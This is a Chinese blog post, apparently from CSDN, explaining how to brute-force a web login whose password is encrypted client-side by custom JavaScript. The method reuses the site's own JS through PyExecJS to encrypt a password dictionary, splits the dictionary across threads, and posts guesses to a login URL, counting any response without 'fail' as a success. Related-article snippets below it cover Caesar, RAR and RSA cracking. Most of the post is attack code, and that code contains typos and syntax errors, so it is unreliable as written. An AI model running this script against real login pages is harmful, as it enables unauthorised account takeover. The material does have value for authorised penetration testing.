python编写自定义JS加密爆破脚本

最新推荐文章于 2024-06-06 22:45:00 发布
最新推荐文章于 2024-06-06 22:45:00 发布
阅读量534 收藏 1
点赞数
文章标签: python 多线程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44825990/article/details/105498640
版权

python编写自定义JS加密爆破脚本

概述

在渗透测试中,有时用户密码在传输时加密方式是用自定义编写的JS脚本加密,不能直接用来爆破,但我们可以利用其自定义的JS将字典加密后多线程爆破。

思路分析

思路有两种,一种是分析JS代码,分析出其加密算法,然后我们转换成我们熟悉的编程语言得到加密后的字典进行爆破;另一种思路是不用分析JS代码,直接利用现成的JS,将字典传入JS加密后得到JS的返回结果进行爆破。这里文章主要讲第二种,直接利用其JS。

分析JS

第一种方法一般用于简单的JS代码,我们可以很简单的看出其算法。大家可以参考绕过前端加密 这篇文章。

执行JS

第二种方法,我们直接利用JS,不用分析JS算法如何,首先需要安装execjs。

pip install PyExecJS

这里我们用md5.js为例利用,将md5.js保存在本地。
我们不用分析JS是如何计算的,但我们要知道JS利用的函数名称,md5.js中得到最后加密结果的函数是hex_md5();利用以下代码即可获得加密后的结果。

import  execjs

with open ('md5.js','r') as jj:
    source = jj.read()
    phantom = execjs.get('PhantomJS')
    getpass = phantom.compile(source)
    mypass = getpass.call('hex_md5', 'admin')  #hex_md5是函数名称
    print (mypass)

这样我们就可以编写一个加密函数getpass(),然后将整本字典跑完后发送requests包进行爆破。

多线程处理字典

为什么要先处理字典呢,因为渗透测试过程中,我们的字典可能不是几十条的小数据,有时可能达到几十兆,面对如此多的数据,如果一条一条加密返回那么太浪费时间了,所以我们需要多线程。
每个线程处理的字典数应该是总字典数除于线程数,而且应该向上取整,例如我们设定线程是10,如果一本字典500条,那么一个线程处理的字典数就是50条;如果是505条,那么平均每个线程的处理字典数是50.5条,我们需要取51条,那么就是前9个线程处理51条,最后一个线程处理剩余的字典数。
我们整理后的字典是什么样呢,是以列表为元素的列表集合,[[],[],[]]其中的每一个元素是该线程处理的字典内容。

import math
import threading

thread=10
resulit_list=[]   #结果列表,元素为该线程处理的字典内容
thread_list=[]   #线程列表,元素为处理字典的线程
with open ("dict.txt","r") as f:
      dict_list=f.readlines()   
      if len(dict_list)%thread==0:
            each_thread=len(dict_list)/thread
      else:
            eacg_thread=math.ceil(len(dict_list)/thread) #math.ceil是向上取整
      i=0
      temp_list=[]  #缓存列表,用来存放目前线程中的字典内容
      for line in dict_list:
             i=i+1
             if i%each_thread ==0: #说明该线程处理内容已满
                    temp_list.append(line.strip())  #将字典内容放入缓存列表
                    result_list.append(temp.list)  #该线程已处理完所以内容 将该线程内容放入结果列表
                    temp_list=[] #清空缓存列表,用于存放下一个线程的处理内容
              else:
                    temp_list.append(line.strip())  #此时线程处理内容还没结束 所以只需将内容加入缓存列表。

所以内容处理结果最后会保存在result_list中,并且有10个元素,分别代表10个线程所处理的内容,我们将10个线程加入我们的线程列表中。

for i in result_list:
      thread_list.append(threading.Thread(target=brute,agrs=(i,)))  #将每个线程所要处理的内容传给brute函数进行爆破
for t in thread_list:
      t.start()     #启动所有线程

爆破函数

下面缺少的就是爆破函数brute(),函数很简单,发送requests包并检验返回包中内容是否有错误语句和字段来判断是否爆破成功。

def brute(dict):
     url= "http://127.0.0.1/login.php"
     headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
     import requests
     for line in dict:
           payload="username=admin&password=%s" %line
           response=requests.post(url=url,data=payload,headers=headers,timeout=5)
           result=response.content
           if result.count("fail")<1    #判断页面中是否有fail内容
                print("success! password is %s"%line)
           else:
                pass
Judassss
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python爬虫遇到JS加密
weixin_41540084的博客
09-08 4811
我们在做python爬虫的时候经常会遇到许多的反爬措施,js加密就是其中一种。 破解js加密的方法也有很多种: 1.直接驱动浏览器抓取数据,无视js加密。 2.找到本地加密js代码,使用python的相关库直接运行js代码。 3.找到本地加密js代码,理清加密逻辑,然后用python代码来模仿js代码的流程,生成我们想要的加密的数据。 这里我们简单介绍一下第三种,也是最难的一种。 目标网站:h...
渗透测试中前端加密如何爆破(详细版)
kATERAS的博客
08-06 2662
前端加密如何爆破
Web暴力破解--前端JS表单加密进行爆破
06-09 3905
0x01 前言   常见的js实现加密的方式有:md5、base64、shal,写了一个简单的demo作为测试。 0x02 代码 login.html &lt;!DOCTYPE HTML&gt; &lt;html&gt; &lt;head&gt; &lt;meta charset="utf-8"&gt; &lt;title&gt;用户登录&lt;/title&gt;
[1286]python执行js代码方法汇总(PyExecJSJs2Py、py-mini-racer)
最新发布
周小董
06-06 2482
在平时爬虫过程中,我们会遇到网站对js文件加密,无法爬取,现在就让我们来了解一下js2py模块,它可以对js文件进行解密。
【自己动手设计一个简单的加密算法Python
weixin_41099712的博客
07-01 3240
加密算法设计 本文设计的加密算法为对称加密中的分组加密算法,算法参考Feistel结构进行设计,分组长度为128比特,密钥长度为128比特,基于类Feistel的加密子结构,迭代次数为8次,每次迭代的密钥通过密钥拓展方法计算得到。因为加密算法是基于Feistel结构,故解密算法很容易得到。 1.1加密子结构设计 本文基于Feistel结构进行设计,将4个Feistel子结构进行并联和级联,期望达到更优的加密效果,加密子结构具体的实现如下: 将128比特的明文分为4个小组,每个小组为32比特,将其放入2个
python执行js代码进行aes加解密以及python代码与前端交互加解密
贵有恒,何必三更眠五更起;最无益,只怕一日曝十日寒
02-23 3696
在前后端交互的过程中,基于安全考虑,往往需要对某些数据进行加密传输,我们以传输密码为例: 如果密码明文传输的话,有被截取的风险,因此我们可以考虑采取rsa加密或者aes加密的方式,本文采用aes加密的方法进行传输。aes加解密,前后端要商定好一致的密钥 一、python调用js代码加解密 前端js代码如下: const CryptoJS = require('crypto-js'); //引用AES源码js const key = CryptoJS.enc.Utf8.parse("eeeeee
根据指定hash值寻键爆破脚本Python实现)
08-22
代码说明 在所有可能的姓名+学号的字符串集合下,找到一个MD5散列值为"sdu_cst_20220610"的键。 通过不断构建随机姓+随机名+固定学号前缀+随机学号后缀组成的合法键进行MD5散列求值,与目标散列值比较,相等则求解...
Python编写固定字典爆破
05-19
"使用方法.png"可能是展示如何运行这个爆破脚本的示意图。 值得注意的是,虽然这种技术在安全测试中具有实际应用,但它也可能会被滥用。因此,确保在合法授权和合适的环境下进行此类操作至关重要,否则可能触犯法律...
RAR压缩包密码爆破工具
05-28
基于python编写的rar压缩包密码爆破小工具,可以针对加密的rar文件密码进行爆破
RSA低解密指数攻击爆破脚本
07-02
在这个案例中,“rsa-wiener-attack-master”可能是一个包含实现Wiener攻击算法的源代码的项目文件夹,可能包括Python或其他编程语言的脚本,用于自动化这个过程。 为了防止这种攻击,RSA密钥生成时应确保d的大小。...
ctf编写
02-17
6. **自动化脚本**:编写自动化脚本解决重复性任务,例如扫描端口、爆破密码、爬虫等,Python的`argparse`库可以帮助构建命令行工具。 7. **Web安全**:Python可以用于构造SQL注入、XSS攻击的payload,`...
passToJs:爆破js加密的后台登陆;JS加密爆破密码;PyExecJS
05-26
爆破遇到js加密 简述 渗透测试过程中,在遇到登陆界面的时候,第一想到的就是爆破。如果系统在传输数据时没有任何加密,没有使用验证码时,还有很大机会进行报错。但是如果使用了验证码和对数据进行加密时,该如何爆破呢? 通常使用的方法:简单的验证码,可以通过python库进行识别;加密的数据,往往会通过审计加密方法,然后进行重新计算后,再进行爆破。 个人项目经历,在某国企单位驻场渗透时,经常发现以下情况的站点: 1、 登陆界面password数据通过js加密; 2、 使用验证码,但大多数系统的验证码可以重复利用 Js加密的站点,由于不是同一个人开发的,使用常用审计加密算法的方法去爆破无疑给自己增加难度。结合上述种种原因,索性直接不管js加密算法,通过python牛逼的库,利用网站js加密文件直接对密码字典进行加密Python JS库:execjs 安装execjs pip install P
python 3 实现jsJSEncrypt encrypt方法,rsa模块根据字符串公钥生成加密字符串
12-13
python3 实现jsJSEncrypt encrypt方法,rsa模块根据字符串公钥生成加密字符串 使用时直接调用rsa_encrypt(s, pubkey_str)方法就好了,第一个参数为待加密字符串,第二个参数为公钥,返回值为加密后的字符串 其中_str2key(s)方法是在https://www.cnblogs.com/masako/p/7660418.html这篇文章的基础上做了细微改动,可能是由于python版本问题,原文章中的代码在python3.7中无法直接使用
js脚本编辑器(通用)
03-29
很方便的jS编辑工具,功能强大,方便易用,推荐使用
Python实现前端JSjsrsasign RSA加密方法
a66920164的博客
07-05 1160
本文通过Python实现了前端jsrsasign库RSA加密方式,加密后数据与前端jsrsasign库一致,可以通过基于其创建的RSA校验,并提供了具体Python代码和解析过程。
python定义一个加密函数_一个python自定义加密解密函数
weixin_39591386的博客
12-08 1757
一个python自定义加密解密函数,下面的代码实现了对字符串的加密盒解密,调用简单def encrypt(key, s):b = bytearray(str(s).encode("gbk"))n = len(b) # 求出 b 的字节数c = bytearray(n*2)j = 0for i in range(0, n):b1 = b[i]b2 = b1 ^ key # b1 = b2^ key...
最常见加密方式和Python实现
qq_38473236的博客
07-28 3698
前言 我们所说的加密方式,都是对二进制编码的格式进行加密的,对应到Python中,则是我们的Bytes。 所以当我们在Python中进行加密操作的时候,要确保我们操作的是Bytes,否则就会报错。 将字符串和Bytes互相转换可以使用encode()和decode()方法。如下所示: # 方法中不传参数则是以默认的utf-8编码进行转换 In [1]: '南北'.encode() Out...
简单的密码加解密python脚本
dhdichch的博客
05-26 1767
目录 base64的编码与解码 md5加密 莫斯密码 凯撒密码 仿射加密 维吉尼亚密码 base64的编码与解码 base64的编码 Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 import base64 str = input("需要加密的明文:") print((base64.b64encode(str.encode())).decode()) 需要注意的就是原始的字符串需要先用...
帮我用python写一个简短的凯撒爆破脚本
09-27
### 回答1: 你好,我可以回答这个问题。以下是一个简短的凯撒密码爆破脚本Python代码: ```python def caesar_crack(ciphertext): for shift in range(26): plaintext = "" for char in ciphertext: if char.isalpha(): plaintext += chr((ord(char) - shift - 65) % 26 + 65) else: plaintext += char print("Shift {}: {}".format(shift, plaintext)) ``` 你可以将密文作为参数传递给`caesar_crack`函数,它将尝试所有可能的偏移量并输出解密后的明文。希望这可以帮助你! ### 回答2: 凯撒密码是一种简单的替换密码,通过将明文中的每个字母替换为字母表中固定偏移量的字母来进行加密。凯撒密码的解密过程就是尝试所有可能的偏移量,直到找到正确的偏移量为止。下面是一个简短的Python凯撒爆破脚本: ```python def caesar_decrypt(ciphertext): for shift in range(26): # 尝试所有可能的偏移量 plaintext = "" for letter in ciphertext: if letter.isalpha(): # 只处理字母字符 ascii_offset = ord('A') if letter.isupper() else ord('a') decrypted_letter = chr((ord(letter)-ascii_offset-shift) % 26 + ascii_offset) plaintext += decrypted_letter else: plaintext += letter print(f"Shift: {shift}, PlainText: {plaintext}") # 加密信息 ciphertext = "F xjxyz cqn qfgm itmf" caesar_decrypt(ciphertext) ``` 在此脚本中,我们定义了一个`caesar_decrypt`函数,输入参数为密文。函数使用一个循环遍历所有可能的偏移量,然后根据偏移量对密文进行解密。解密过程中,我们使用`ord`函数将字符转换为ASCII码,然后通过对应的偏移量进行计算,使用`chr`函数将ASCII码转换回字符。最后,我们通过打印输出所有尝试的偏移量和相应的明文。 使用示例中,密文为"F xjxyz cqn qfgm itmf",在对每个偏移量进行尝试后,我们可以观察到其中一个明文输出为"I triumph in defeat",这是正确解密的明文。其他输出则是错误的偏移量导致的解密结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值